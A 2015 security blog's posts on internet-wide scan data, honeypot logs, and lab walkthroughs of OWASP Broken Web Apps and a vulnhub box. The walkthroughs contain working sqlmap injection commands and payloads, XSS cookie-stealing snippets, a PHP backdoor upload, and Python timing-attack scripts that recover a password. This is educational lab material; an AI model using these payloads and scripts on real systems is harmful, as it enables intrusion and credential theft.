Tuesday, April 28, 2015

Analysis of scans.io - Rapid7 UDP Scans - UPnP

I pulled from the scans.io "Internet-Wide Scan Data Repository" the dataset provided by Rapid7 about UPnP.  This download was 1GB in size then when it was uncompressed to being 14GB.  My intent of analyzing this information is to identify the number of IP Addresses that respond to the UPnP scan then identify which internet service providers have the largest concentration of the vulnerabilities.

Below is the first command that I used to parse out the IP Address of the responding device:

cat 20150420-upnp-1900.csv | awk -F "," '{print $2}' > ipAddr.raw

Then I found that some hosts responded multiple times on the UPnP request.  So I sorted the IP Addresses and then wrote back to a file only the unique addresses with the following command:

cat ipAddr.raw | sort | uniq > sorted_ipAddr.raw

With that file I was able to derive the following number that shows how many IP Addresses responded to the UPnP scan:

2,991,548

Wow! Then I took the list of IP Addresses and took off the last octet sorted then and then counted the occurrences as if a 255.255.255.0 subnet mask was used to determine the network address.  This provided the following list.  With the list I am listing the count of addresses, the first 3 octets of the IP Address, the country where the addresses are, and the name of the ISP.  I have removed from the list if the ISP displays multiple subnets, and incremented the number of hosts observed if they were encountered for the same ISPs.

786* - 83.164.x.x - Austria - lagis Internet Serviceprovider
254* - 183.252.52.x - China - China Mobile Communications Corporation
3,143* - 91.126..x - Spain - Adamo Telecom Iberia S.A.
911* - 173.241.64-79.x - Mississippi, US - neXband Communications. Inc. 
1,289* - 109.111.248-255.x - Serbia - Orion Telekom , CDMA Users
11,371* - 5.246-247.x.x - Saudi Arabia -  Broadband IP Range
203* - 201.254.88.x - Argentina - Telefonica de Argentina
203 - 190.177.83.x - Argentina - Telefonica de Argentina
202 - 190.177.67.x - Argentina - Telefonica de Argentina
195 - 89.29.238.x - Spain - TV ALMANSA, Servicios de Comunicacion

Observing the number of devices that respond to the UPnP probe on a given service providers network is interesting.  Especially for the Saudi Arabia IP range.  This IP Address Range is from 5.246.0.1 - 5.247.255.255.

I wanted to take a closer look to see if each of these devices appeared to be the same.  To do this I went back to the FTP dataset that I pulled down and searched for the network address of "5.246.*".  Looking at the below screenshot identifies that each device has an FTP server running bftpd 2.2.


Also I was curious when bftpd 2.2 was released.  I found on their website that the latest version is version 4.4.  The 2.2 release was made on March 21, 2008.  Also observing that this FTP software is hosted on Sourceforge as an open source project.

I could not find a release of version 2.2 on SourceForge.  I also found an exploit that could cause a denial of service on the router.

In my opinion the ISP should fix the vulnerability of UPnP being open, at least when the device is issued by them.

HD Moore said, “If  the attacker is able to compromise the device using the UPnP discovery or SOAP services, they would be able to steal data, sniff traffic, and target other systems on the network. In the case of home routers, they would be able to force users accessing the internet to visit a page laden with malware instead of their real destination.”

Read more at http://www.techweekeurope.co.uk/workspace/how-attackers-will-exploit-upnp-105868#pP8k589IKCUVERb8.99

Monday, April 27, 2015

Analysis of scans.io - University of Michigan · Full IPv4 FTP Banner Grab

On this post I have downloaded from the "Internet-Wide Scan Data Repository" located at scans.io the data set from 4/17/2015 for "Full IPv4 FTP Banner Grab".  My intention of analyzing this information is only to analyze the headers.  I am curious what percentage of the headers have published exploits for them and the most common headers.

After downloading the file and extracting it to be the size of 5GB I then parsed it with the following command to only grab the FTP Banner.  Then I also parsed it to only give me the first line:

cat b70f5n9ffx49j6g8-zgrab-results-21-ftp-banner-full_ipv4-20150417T160718.json | sed 's/^.*response":"220//' | sed 's/"},"error.*$//' | grep -v "host" | sed 's/\\r\\n.*//' | sed 's/^$//' > ftp_banner_raw.txt

With the above information I did a count on the number of lines to identify the number of FTP servers in the dataset that either responded on port 21 or timed out trying to receive a response on port 21:

13,802,278 - Total FTP Banners

Then using the ftp_banner_raw.txt file I then sorted and counted the unique instances to find the most common headers.

cat ftp_banner_raw.txt | sort | uniq -c | sort -nr > sorted_ftp_banner_raw.txt

With the above command below I have placed the top 10 most common headers found in the dataset.  The information displayed is the number found, followed by the percentage of the total population that it is, and then the banner line:

2,370,756 (17.2%) ---------- Welcome to Pure-FTPd  ----------
1,195,904  (8.7%) Microsoft FTP Service
1,065,477  (7.7%)
 671,654  (4.9%) Ftp firmware update utility
 647,822  (4.7%) FTP Server ready.
 301,211  ProFTPD 1.3.3g Server
 277,210  FTP server ready.
 275,113  ProFTPD 1.3.4a Server
 269,944 -Microsoft FTP Service
 205,591  ProFTPD 1.3.5 Server

Now below here I am going to list the FTP banners that display a type and version that are out-of-date or possibly could be exploited by a publicly available exploit:

301,211  ProFTPD 1.3.3g Server  - Exploit Available
275,113  ProFTPD 1.3.4a Server  - 1.3.5 is the most up-to-date server version
131,333  FileZilla Server version 0.9.41 beta - Exploit Available
84,426  ProFTPD 1.3.4c Server - 1.3.5 is the most-up-to-date server version
81,101  ProFTPD 1.3.3a Server - Exploit Available
70,881  ProFTPD 1.3.1 Server - Exploit Available
62,940  FileZilla Server version 0.9.24 beta - Exploit Available
60,920  Serv-U FTP Server v6.2 for WinSock - Exploit Available
48,328  ProFTPD 1.3.3e Server - Exploit Available
39,463  ProFTPD 1.3.4d Server  - 1.3.5 is the most-up-to-date server version

With the above information I came up with the following number of vulnerable FTP servers due to an exploit that I accounted for.  Though there may be false-positives and my research could be flawed, I would bank on in reality this number is a lot higher:

1,155,716

Then if you divide that by the total number of FTP servers available you get the following percentage of FTP servers that are vulnerable to an available exploit:

8.4%

I again found this research very interesting.  Wow! The question I end with, how do we get this in the hands of the right-people to get these vulnerabilities fixed? How is it possible to fix over a million FTP servers?

Saturday, April 25, 2015

0.7% or 311,026 IP Addresses found continue to be vulnerable to Heartbleed

As I was glancing through the logs of my honeypots I spent some time to look at the following logs.  In the past I have just overlooked them:


The URL in the "User Agent" section of the log turned out it was legit.  So I went to the following site "project25499.com".


I found the two publications published to be of value at Rapid7: Legal Considerations for Widespread Scanning and ZMAP: Scanning Best Practices.

If you follow to the ZMAP site where a tool can be acquired to do this sort of scanning it lists the following as best practices:

Through looking further at the home page you notice the University of Michigan is involved in this research and the maintenance of the tool.  From here you can find the site "https://scans.io".  

This is an internet-wide scan data repository.  Here is where they publish the raw output of the scans that they conduct.  The section that again caught my eye was on "Heartbleed".  After clicking on the title I found a 100GB lz4 compressed file with their raw output from their scanning for the vulnerability of heartbleed.


I decided with this information I wanted to know how many IP Addresses are they detecting that continue to be vulnerable to heartbleed.  After downloading the file, using python to uncompress the lz4 file, and then parsing the information.  I found:

311,062

IP addresses continue to show that they are vulnerable to heartbleed.  I understand that a percentage of these may not be vulnerable and some would be false-positives.  I however, am not going to look closer at this to determine the percentage that are truly vulnerable.

Well then I was curious, how many IP Addresses show up in the 100GB lz4 compressed log.  The following number are the total number of IP addresses I found in the log:

42,903,896

With that said you still observe that the following percentage of the dataset of IP addresses that respond with a vulnerable version of SSL on port 443 is:

0.7%

I also was curious from the initial sample of 311,062 IP addresses which countries they originated from.  Below are the top 12 country abbreviations and the count indicating how many IP addresses are in each country based on the information in the SSL certificate that was gathered:

137,324 "US" United States
  26,646 "--"  Probably self signed certificates without designating a country
  17,646 "CN" China
  14,401 "AU" Australia
   7,655 "XX" Probably self signed certificates
   6,695 "DE" Germany
   6,625 "GB" United Kingdom
   4,452 "SE"  Sweden
   4,297 "KR" Korea
   3,034 "IL"  Israel
   3,008 "RU" Russia
   2,949 "FR" France

Wow! I was fascinated at this resource and the numbers that were gathered from it. 

Send an Image in-line using Python

Referencing the following site I created an HTML email with an image inline.
http://code.activestate.com/recipes/473810-send-an-html-email-with-embedded-image-and-plain-t/

Below is the source code from the above site:

from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEImage import MIMEImage

strFrom = 'user@domain.com'
strTo = "user@domain.com"

msgRoot = MIMEMultipart('related')
msgRoot['Subject'] = 'Email'
msgRoot['From'] = strFrom
msgRoot['To'] = strTo
msgRoot.preamble = 'This is a multi-part message in MIME format.'

msgAlternative = MIMEMultipart('alternative')
msgRoot.attach(msgAlternative)

msgText = MIMEText('&nbsp;&nbsp;Email Text<br /><br /><img src="cid:image1"><br /><br />Email Text</body></html>', 'html')
msgAlternative.attach(msgText)

fp = open('pic.png', 'rb')
msgImage = MIMEImage(fp.read())
fp.close()

# Define the image's ID as referenced above
msgImage.add_header('Content-ID', '<image1>')
msgRoot.attach(msgImage)

# Send the email (this example assumes SMTP authentication is required)
import smtplib
smtp = smtplib.SMTP()
smtp.connect('mail.server.com')
smtp.sendmail(strFrom, strTo, msgRoot.as_string())
smtp.quit()

Thursday, April 9, 2015

What's in the honeypot? Advanced Information Security Shellshock Scanner

In the honeypot I found over 276 requests for cgi files that could be accessed to leverage the shellshock vulnerability documented as CVE-2014-6271.


After using google to identify some of the "cgi" files I noticed a tool that they had utilized to scan the honeypot.  The tool is located on packet storms site at the following location.

The tool is called the "Advanced Information Security Shellshock Scanner" or AIS.  It is a c program that can be compiled to then scan multiple computers based on IP Addresses.  The program was authored by "Nicholas Lemonias" and posted Oct. 3, 2014.

A little about "Nicholas Lemonias".  I was able to find his Google+ page as shown below:
Also viewing his author page at packet storm and many other pages he has created quite the collection of exploits.

Well back to the curiosity of the cgi files.  I wanted to go through some of them and search google and try and identify what software, hardware, or device that it may reside on that they are trying to exploit.  The following is a list of the cgi files with the products listed next to them:

""/agora.cgi" - Agora Shopping Cart - Currently version 6.0
"/aktivate/cgi-bin/catgy.cgi" - Aktivate Shopping Cart - Exploits date back to 2002 - Inactive
"/apps/web/vs_diag.cgi" - Banshee DAAP Extension for the Media Player - Active
"/axis-cgi/buffer/command.cgi" - Axis Communications Video Server 
"/cartcart.cgi" - ?? Found that multiple sites have this file
"/ccbill/whereami.cgi" - Related to a credit card billing site - Exploits date back to 2003
"/cgi-bin/boozt/admin/index.cgi" - Boozt! Clothing Store
"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi" - Cobalt RaQ Servers - Inactive
"/cgi-bin/ezshopper/search.cgi" - EZ Shopper

So taking a quick sample of the cgi scripts that are searched for, I find that this is a very inefficient tool.  It scans for cgi files that are specific to shopping sites.  A couple of them were for shopping carts that would be downloaded and installed.  To make this script more efficient I would find the widely available cgi files verses having more specific ones.  So if I was to give the tool a grade I would give it the following:


If I was to give the script kiddie a grade that was using it, they would receive an "F" for failing to do reconnaissance on a site first rather than just throwing a tool at it.






Wednesday, April 8, 2015

OWASP Broken Web Apps - Broken Wordpress - Reset Password Flaw

I started to observe the password reset function of the wordpress blog and found a flaw in the generation of the md5 hash.

Starting on line 141, you can observe the function that is executed to generate a new password for a user as shown below:


The utilization of the microtime, uniqid, and the md5 functions in conjunction with each other was a clever way of generating the $new_pass or the new password.  However observe that the value created is then truncated to 7 characters.

The truncated password of 7 characters leads to a password with 16^7 possible password combinations that are then md5 hashed.  This equates to less than 300,000 possibilities that the password could be.  Why are there only 16 character possibilities? An MD5 hash is composed of 16 characters consisting of the numbers 0-9 and the letters a-f.

A typical alpha-numeric password using upper-case, lower-case, and numbers that is 7 characters long consists of 62^7 possibilities that the password could be.  This is much stronger than using the sub-string of an MD5 hash.

If they would have left off the substr function this would have been stronger than placing it and then hashing again the $new_pass.

Again, this is a flaw in the strength of the random password that is created when a reset password function in the web application is triggered.

If the admins email address is known for the site then a password can be reset for the administrator.  Then this brute-force attack can be conducted and you can login to the account in less than a day depending on how observant the admin is that the password was reset and the speed of the connection to the site.

Tuesday, April 7, 2015

OWASP Broken Web Apps - GetBoo Walkthrough

Here is a quick walk through of GetBoo.  The first item that I found was you can harvest the usernames of the existing users that are registered.  First click on the register link in the upper-right area of the screen:



Though the window pops up for only a few seconds you can capture the URL in a proxy.  Then by clicking the availability link then the URL comes up as follows:

http://172.16.102.135/getboo/checkUsername.php?usernameToCheck=test

Doing a quick check with sqlmap and placing a single apostrophe does not detect sql injection but it still could exist.  However I noticed you can use OWASP-Zap and fuzz the username field.  After loading ZAP and accessing that URL you see the following:



Now you can highlight test on the first line and then right-click and select Fuzz.  Then if you have created a username list you can select it and begin fuzzing.  Then by looking at the results below we can derive a few things:

If you observe the size of the response from the webserver for the username bob+ you find the message of an "Incorrect Username Format is used", then for the size of 560 you find that the username is available, and then with the size of 563 this is a username that is being used.  From this we can derive through brute force the usernames using the site.  From this list you could then brute-force passwords also.

The next vulnerability is I wanted to test the registration of a user to see if it is vulnerable to sql injection.  The following command I executed to test the POST parameters for sql injection:

sqlmap -u "http://172.16.102.135/getboo/newuser.php" --data "aname=test2&pass=test2&pass2=test2&email=test2%40test2.com&hint=test2&captcha=GSWNI&email2=&submitted=Register"

This did not work so I began testing other POST locations for parameters.  Due to the email not being setup I went to the "Forgot Password" page.  I ran sqlmap again with those POST parameters as shown below:

sqlmap -u "http://172.16.102.135/getboo/forgotpass.php" --data="aname=test2&email=test2%40test2.com&submitted=Hint+question"

This came back with results showing that this is vulnerable to SQL Injection.

OWASP Broken Web Apps - Broken Wordpress Walkthrough

I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM.

The first one I thought I would walkthrough is the "Broken Wordpress" site.  To begin the analysis I am trying to gather information about the site using nikto and wpscan.  The results with the commands executed I have placed below:

# nikto -h http://172.16.102.135/wordpress/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.102.135
+ Target Hostname:    172.16.102.135
+ Target Port:        80
+ Start Time:         
---------------------------------------------------------------------------
...snip...
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
...snip....
+ mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/3.0.17 mod_perl/2.0.4 Perl/v5.10.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
...snip...
+ Server leaks inodes via ETags, header found with file /wordpress/php.ini, inode: 278054, size: 386, mtime: Sun Mar 21 14:12:24 2010
...snip...
+ OSVDB-3092: /wordpress/xmlrpc.php: xmlrpc.php was found.
...snip...
+ /wordpress/readme.html: This WordPress file reveals the installed version.
...snip...
+ OSVDB-3092: /wordpress/license.txt: License file found may identify site software.
+ /wordpress/wp-login/: Admin login page/section found.
+ 6602 requests: 0 error(s) and 28 item(s) reported on remote host
+ End Time:            (62 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

CVE-2002-0082 - I tested this vulnerability not saying that it is not vulnerable.  I found the exploit 764.c that can utilize the buffer overflow in mod_ssl.  However this is applicable to the /usr/sbin/httpd binary not the /usr/sbin/apache2 binary.

Through the research to get this exploit to work on Kioptrix Level 1 I referenced the following pages:
http://poc-hack.blogspot.com/2012/08/kioptrix-hacking-challenge-level-1-part.html
http://paulsec.github.io/blog/2014/04/14/updating-openf***-exploit/

After fixing the code for the exploit based on the above sites and testing it on Kioptrix level 1 and it worked I attempted it on the broken web apps site.  Then I ran the objdump -R /usr/sbin/apache2 to identify a memory address of free.  I found one and added it to the code but this failed.  I gave up on this exploit for now not to say however there is not a vulnerability that could be exploited here.


The next item in the nikto log was the display of the contents of the file /wordpress/php.ini.  This file however does not display any additional information. Then I scanned down to see the following "+ /wordpress/readme.html: This WordPress file reveals the installed version." After viewing this file we find that it is version 2.0 of wordpress.

Doing a quick search of the exploit-db you find "http://www.exploit-db.com/exploits/6/".  This exploit only works if you have a username and password.  Luckily the admin password is admin.  The other item is the database password needs to be contained in a dictionary file.  The database password is simply "wordpress".  With this knowledge the exploit was easily exploited as shown below using the following command "php exploit.wordpress2 172.16.102.135 /wordpress/ admin admin ls -la -Ddic.txt":



You could say well what if you did not know the admin username and password.  You could register a user and be emailed a password.  Then you could utilize that, and then brute force the MySQL database.

Through an authenticated admin you can upload a backdoor.  I simply uploaded the simple-backdoor.php as a renamed file of sb.php.  This allowed access to the use of shell commands as the www-data user.

Posting of comments to a post and creating a new post with the following XSS items below will expose the cookies or include an iframe.

<p><script>alert(document.cookie);</script>
<iframe src="http://172.16.102.1/" /></p>

I also ran wpscan or Word Press Scan.  The results are below.  I briefly skimmed over these results:

_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                        Version v2.4.1
     Sponsored by the RandomStorm Open Source Initiative
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://172.16.102.135/wordpress/
[+] Started: Mon Apr  6 20:32:32 2015

[!] The WordPress 'http://172.16.102.135/wordpress/readme.html' file exists
[+] Interesting header: SERVER: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/3.0.17 mod_perl/2.0.4 Perl/v5.10.1
[+] Interesting header: STATUS: 200 OK
[+] Interesting header: X-POWERED-BY: PHP/5.3.2-1ubuntu4.5
[+] XML-RPC Interface available under: http://172.16.102.135/wordpress/xmlrpc.php

[+] WordPress version 2.0 identified from meta generator
[!] 9 vulnerabilities identified from the version number

[!] Title: Wordpress wp-register.php Multiple Parameter XSS
    Reference: http://osvdb.org/38577
[i] Fixed in: 2.0.2

[!] Title: WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability
    Reference: http://www.securityfocus.com/bid/35584/

[!] Title: XMLRPC Pingback API Internal/External Port Scanning
    Reference: https://github.com/FireFart/WordpressPingbackPortScanner

[!] Title: WordPress XMLRPC pingback additional issues
    Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

[!] Title: wp-includes/comment.php bypass intended spam restrictions via a crafted URL
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5293
[i] Fixed in: 3.0.2

[!] Title: Multiple cross-site scripting (XSS) in the request_filesystem_credentials function in wp-admin/includes/file.php
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5294
[i] Fixed in: 3.0.2

[!] Title: Cross-site scripting (XSS) in wp-admin/plugins.php
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5295
[i] Fixed in: 3.0.2

[!] Title: wp-includes/capabilities.php when a Multisite configuration is used, does not require the Super Admin role for the delete_users capability, which allows remote authenticated administrators to bypass intended access restrictions via a delete action.
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5296
[i] Fixed in: 3.0.2

[!] Title: When a Multisite installation is used, permanently retains the "site administrators can add users" option once changed, which might allow remote authenticated administrators to bypass intended access restrictions in opportunistic circumstances via an add action after a temporary change.
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5297
[i] Fixed in: 3.0

[+] WordPress theme in use: default - v1.5

[+] Name: default - v1.5
 |  Location: http://172.16.102.135/wordpress/wp-content/themes/default/
 |  Style URL: http://172.16.102.135/wordpress/wp-content/themes/default/style.css
 |  Theme Name: WordPress Default
 |  Theme URI: http://wordpress.org/
 |  Description: The default WordPress theme based on the famous <a href="http://binarybonsai.com/kubrick/">Kubric...
 |  Author: Michael Heilemann
 |  Author URI: http://binarybonsai.com/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Mon Apr  6 20:32:38 2015
[+] Memory used: 996 KB
[+] Elapsed time: 00:00:05


Well the above exploits require you to have authenticated to the site.  Let's look at a sql injection vulnerability that exists in a plugin on the site.

If you observe the 2 plugins being used the first is the "Wordpress Plugin Spreadsheet v0.6".  Doing a quick google search the following result came up.

By pulling up the exploit-db page for this exploit it leads us to the following location:
Then by browsing to the folder you can see that directory listing is not disabled.  You can actually see all the files in the directory used by the plugin.

The ss_load.php is the vulnerable file that allows for sql injection.  I followed the exploit and instead added a simple quote to see if it would cause a visual sql error message to appear on the screen.


Then you can exploit it by hand or by using sqlmap.  Below is the output from sqlmap that demonstrates that the variable ss_id is vulnerable to sql injection:

sqlmap -u "http://172.16.102.135/wordpress/wp-content/pns/wpSS/ss_load.php?ss_id=1"

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:23:25

[22:23:26] [INFO] testing connection to the target URL
[22:23:26] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:23:27] [INFO] target URL is stable
[22:23:27] [INFO] testing if GET parameter 'ss_id' is dynamic
[22:23:27] [INFO] confirming that GET parameter 'ss_id' is dynamic
[22:23:27] [INFO] GET parameter 'ss_id' is dynamic
[22:23:28] [INFO] heuristic (basic) test shows that GET parameter 'ss_id' might be injectable (possible DBMS: 'MySQL')
[22:23:28] [INFO] testing for SQL injection on GET parameter 'ss_id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
[22:23:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:23:52] [WARNING] reflective value(s) found and filtering out
[22:23:52] [INFO] GET parameter 'ss_id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:23:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:23:53] [INFO] GET parameter 'ss_id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
[22:23:53] [INFO] testing 'MySQL inline queries'
[22:23:53] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:23:53] [WARNING] time-based comparison requires larger statistical model, please wait...................
[22:23:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:23:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:24:05] [INFO] GET parameter 'ss_id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable 
[22:24:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:24:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:24:06] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:24:06] [INFO] target URL appears to have 4 columns in query
[22:24:07] [INFO] GET parameter 'ss_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'ss_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:
---
Place: GET
Parameter: ss_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ss_id=1 AND 1018=1018

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: ss_id=1 AND (SELECT 1220 FROM(SELECT COUNT(*),CONCAT(0x71616e6271,(SELECT (CASE WHEN (1220=1220) THEN 1 ELSE 0 END)),0x7171786c71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: ss_id=-3459 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71616e6271,0x4e4458524f6d69564d53,0x7171786c71)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ss_id=1 AND SLEEP(5)
---
[22:24:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[22:24:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.102.135'

[*] shutting down at 22:24:16

Then to dump the contents of the wp_users table we used sqlmap again with different command line parameters.



peepdf - Quick Reference

Recently I had to pull apart a PDF to investigate if it contained malware.  I wanted to record a few of the sites that I visited and gathered information from to accomplish the task.

The homepage and download location for the peepdf tool is located at the current time here:
http://eternal-todo.com/tools/peepdf-pdf-analysis-tool#releases

Here is a walkthrough of some of the commands:
http://eternal-todo.com/tools/peepdf-pdf-analysis-tool#usage

This entry is how to save to an external file javascript, shellcode or other information out of the PDF file:
http://eternal-todo.com/blog/extract-streams-shellcode-peepdf

Other resources that I happened upon:
https://zeltser.com/peepdf-malicious-pdf-analysis/
http://www.insinuator.net/2014/02/analyzing-a-cve-2013-3346cve-2013-5065-exploit-with-peepdf/

Thursday, April 2, 2015

vulnhub - Pandora's Box by c0ne Level 1 - Following walkthrough by strata

I was looking through the boot 2 root vulnerable images that they have on vulnhub.com and Pandora's box caught my eye.  I wanted to follow and experiment with this timing attack described in the walkthrough done by strata.  I am using code that resembles that used by strata.

To briefly describe what is occurring to gather the first password.  You can connect on port 54311 and you are prompted for a password.  strata determined through some testing that if you guessed the correct letter in the password it would return quicker than if you did not.  I wanted to be able to see this so I created the following script:

#!/usr/bin/python

import socket
import time
import sys

server="172.16.102.137"
dstPort=54311
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, dstPort))

def returnDuration(sentStr):
p = time.time()
while True: 
infoRecv = s.recv(1024)
#print infoRecv
if 'Password:' in infoRecv:
dur = time.time() - p
s.send(sentStr)
#print sentStr
p = time.time()
break
return dur

prevChar = ''
for c in chars:
duration = returnDuration(c)
sys.stdout.write('Character: '+prevChar+' Duration: '+str(duration)+'\n')
#sys.stdout.flush()
prevChar = c

s.close()


Then looking at the output generated below you can see 1 time that I have placed in bold that is unique compared to the rest of them:

Character:  Duration: 0.00488305091858
Character: A Duration: 0.00655603408813
Character: B Duration: 0.00632214546204
Character: C Duration: 0.00625109672546
Character: D Duration: 0.00619411468506
Character: E Duration: 0.00643992424011
Character: F Duration: 0.00619196891785
Character: G Duration: 0.00631403923035
Character: H Duration: 0.00625681877136
Character: I Duration: 0.00621390342712
Character: J Duration: 0.00630879402161
Character: K Duration: 0.00599098205566
Character: L Duration: 0.00684380531311
Character: M Duration: 0.00607490539551
Character: N Duration: 0.00646018981934
Character: O Duration: 0.0061399936676
Character: P Duration: 0.00625014305115
Character: Q Duration: 0.00637698173523
Character: R Duration: 0.00049901008606
Character: S Duration: 0.00582885742188
Character: T Duration: 0.00612902641296


You can see that when the R is sent it is returned with a duration of 4/10,000th of a second verses 6/1,000th of a second.  With this knowledge we can move onto the second letter and see the timing difference of it. Below is the script that was created:

#!/usr/bin/python

import socket
import time
import sys

server="172.16.102.137"
dstPort=54311
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
myString = "R"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, dstPort))

def returnDuration(myStr, sentStr):
p = time.time()
while True: 
infoRecv = s.recv(1024)
if 'Password:' in infoRecv:
dur = time.time() - p
theString = myStr + sentStr
s.send(theString)
p = time.time()
break
return dur

prevChar = ''
for c in chars:
duration = returnDuration(myString, c)
sys.stdout.write('Character: '+myString+prevChar+' Duration: '+str(duration)+'\n')
#sys.stdout.flush()
prevChar = c

s.close()

Then here is the output showing the time differential:

Character: Rx Duration: 0.00620317459106
Character: Ry Duration: 0.00646805763245
Character: Rz Duration: 0.00625610351562
Character: R0 Duration: 0.00633692741394
Character: R1 Duration: 0.00613498687744
Character: R2 Duration: 0.0062358379364
Character: R3 Duration: 0.00074315071106
Character: R4 Duration: 0.00586795806885
Character: R5 Duration: 0.00628089904785
Character: R6 Duration: 0.00626301765442

With this information we know that the first letter of the password is R and then 3 for the second character. Then I modified the script to build the string that is the password to login:

#!/usr/bin/python

import socket
import time
import sys

server="172.16.102.137"
dstPort=54311
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
myString = ""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, dstPort))

def returnDuration(myStr, sentStr):
p = time.time()
while True: 
infoRecv = s.recv(1024)
if 'Password:' in infoRecv:
dur = time.time() - p
theString = myStr + sentStr
s.send(theString)
p = time.time()
break
return dur

prevChar = ''
avgDuration = 0
totDuration = 0
counter = 1
while True:
for c in chars:
duration = returnDuration(myString, c)
if (duration < (avgDuration - 0.002)):
sys.stdout.write('Character: '+myString+prevChar+' Duration: '+str(duration)+'\n')
sys.stdout.flush()
myString += prevChar
break
totDuration += duration
avgDuration = totDuration / counter
prevChar = c
counter += 1

s.close()

The output of the script is shown below:

Character: R Duration: 0.000787973403931
Character: R3 Duration: 0.000657081604004
Character: R3s Duration: 0.000658988952637
Character: R3sp Duration: 0.000643968582153
Character: R3sp3 Duration: 0.000663042068481
Character: R3sp3c Duration: 0.000618934631348
Character: R3sp3ct Duration: 0.000653028488159
Character: R3sp3ctY Duration: 0.001296043396
...snip...
Character: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY Duration: 0.000643968582153
Character: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY0 Duration: 0.000671863555908
Character: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04 Duration: 0.000775098800659
Character: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04r Duration: 0.000690937042236
Character: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG Duration: 0.000648021697998
Character: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0 Duration: 0.000640153884888


From this we can conclude the password is "R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0d".






What's in the honeypot? Frequency of SSH Login Attempts based on Country of Origin

Today looking at the logs of the honeypots, I became curious based on the whois of the IP Addresses attempting to login to SSH which country they have come from:


